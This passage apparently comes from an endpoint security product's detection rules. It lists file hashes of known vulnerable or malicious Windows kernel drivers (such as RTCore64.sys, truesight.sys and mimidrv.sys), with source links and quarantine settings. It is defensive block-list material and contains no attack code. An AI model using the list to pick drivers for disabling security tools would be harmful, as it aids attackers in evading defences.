+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473184Z",
+ "creation_date": "2026-03-23T11:45:30.473187Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473196Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c5c6c350c8dd4ca90a8cca0ed1eeca185ebc67b1100935c8f03eb3032aca388",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eac65c31-301b-5b9c-9927-aea3d0796874",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606043Z",
+ "creation_date": "2026-03-23T11:45:29.606045Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606050Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3503ea284b6819f9cb43b3e94c0bb1bf5945ccb37be6a898387e215197a4792a",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eac65cde-7450-5f8e-ad5c-ad17591f0cad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816711Z",
+ "creation_date": "2026-03-23T11:45:30.816713Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816719Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1076504a145810dfe331324007569b95d0310ac1e08951077ac3baf668b2a486",
+ "comment": "Vulnerable Kernel Driver (aka tdeio64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eac97563-a472-5e56-92c7-63d7fa9c6a8a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617466Z",
+ "creation_date": "2026-03-23T11:45:29.617468Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617473Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d2182b6ef3255c7c1a69223cd3c2d68eb8ba3112ce433cd49cd803dc76412d4b",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eaca3cc5-3554-5b31-a3ad-b72ea6126aea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473266Z",
+ "creation_date": "2026-03-23T11:45:31.473270Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473279Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4af90ad45d4ddde16668ee510cea281c2b82ec1dd3781b091eb3769e76a6a54e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eacfa977-21a7-582c-a8a0-524f45888ad4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153718Z",
+ "creation_date": "2026-03-23T11:45:31.153720Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153726Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "079eb5d41b6caeb7ca008b3b22a1219fbb76a14327401071bd04fdc05d6e3301",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ead387ba-dcb9-55c2-a59c-aefc236565c2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835720Z",
+ "creation_date": "2026-03-23T11:45:30.835722Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835727Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "80025dbd57fa67b9753652f1bedf4405cfd85e397f470a1cb820deedab1c9666",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ead912e0-3976-5b16-8a15-23ead6cf9af1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489196Z",
+ "creation_date": "2026-03-23T11:45:31.489198Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489203Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "70f812f516906f4af9a2be348c4ed2f49589cfeddfa1d05b3863b0794d61178d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eae2f9fd-8894-573b-9b08-d27c448fd766",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970106Z",
+ "creation_date": "2026-03-23T11:45:29.970108Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970113Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c13745de817eb38a092524cd3dae805c8fbde967e635e485243782db955508cc",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eae4ee15-3638-5cbd-955f-7fa122f9dd53",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978458Z",
+ "creation_date": "2026-03-23T11:45:29.978460Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978465Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "959860cea7a720811a960e28e0318c470948d96ab3ba3312d20fea0f24bc0979",
+ "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/a7628504-9e35-4e42-91f7-0c0a512549f4/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb0856c4-59dc-5575-a9dc-02ab0f91c1e5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144800Z",
+ "creation_date": "2026-03-23T11:45:32.144803Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144809Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9d5e8700a434838eb63a0573178b4291f07a9d96dabfb4ead40253a3cd9edefd",
+ "comment": "Vulnerable Kernel Driver (aka ViveRRAudio.sys) [https://www.loldrivers.io/drivers/4cb95b41-43b4-4806-b536-ae5fd8c76b0e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb0a86ab-4216-5ddd-90c3-5e84519d3022",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979446Z",
+ "creation_date": "2026-03-23T11:45:29.979448Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979453Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6661320f779337b95bbbe1943ee64afb2101c92f92f3d1571c1bf4201c38c724",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb11ae03-395c-5eba-bb9f-1d9403a90a34",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825651Z",
+ "creation_date": "2026-03-23T11:45:30.825653Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825659Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8404e44c1313e7d04dc89fd5e565f27696edb211da48992a843da5bb79eeef17",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb1484cf-c71e-5a2d-87fd-bf91c7397363",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985162Z",
+ "creation_date": "2026-03-23T11:45:29.985164Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985170Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e0eb0811a7cf1bdaf29d3d2cab373ca51eb8d8b58889ab7728e2d3aed244abe",
+ "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb1e05ef-f6e0-50e6-9534-544e7485ce8f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460494Z",
+ "creation_date": "2026-03-23T11:45:30.460497Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460506Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f48f31bf9c6abbd44124b66bce2ab1200176e31ef1e901733761f2b5ceb60fb2",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb228c42-27b2-5d68-b9a7-4a2893b28e01",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458344Z",
+ "creation_date": "2026-03-23T11:45:30.458347Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458356Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "410d79a49c02da50f4567166d5acef977b5dbc3aafb67522939bf902e65596a5",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb2e91a7-b6ac-59d2-966c-2781a01d40a7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498658Z",
+ "creation_date": "2026-03-23T11:45:31.498661Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498668Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a87819c0f9bc3a1c591d04a3d0bc08ba7275d8c85e59681a6bff4083fe91bd6e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb30bdf3-2723-5cc7-8ec5-e450a07ac490",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150089Z",
+ "creation_date": "2026-03-23T11:45:31.150091Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150096Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a66de0bc76312ea46da3e5eda7fe9053ffd14a24a587baddafbdf487c85da68b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb48d59c-3700-5231-9d53-30f1c02c0e4c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819244Z",
+ "creation_date": "2026-03-23T11:45:31.819247Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819252Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d818b61ad6877c1e82c4ac32b86c2da42990919b1c61b068e279c8b5b46ffc4c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb581438-27f2-5038-9bf8-5009f963cc65",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480868Z",
+ "creation_date": "2026-03-23T11:45:31.480886Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480893Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e03dc0423f91a1d8b7832b10e87e44d89c3533bc5dd09fcbc8581cec881aa028",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb5fbdec-1845-501b-8519-86903bb30a58",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470698Z",
+ "creation_date": "2026-03-23T11:45:30.470701Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470710Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fa659944a59430edc6162b285d0fa7b6fbfd28b9057f7286eee127888431844e",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb687ac1-11a1-53ce-96ca-db9b29f7fb52",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141183Z",
+ "creation_date": "2026-03-23T11:45:31.141185Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141191Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89de85cf244a5dc4591e4f733d8e722f68673b74ebdfafd674bf10f84c9a7b15",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb6922d5-90a0-51a2-b4c6-3fe8d9b4a31c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614489Z",
+ "creation_date": "2026-03-23T11:45:29.614491Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
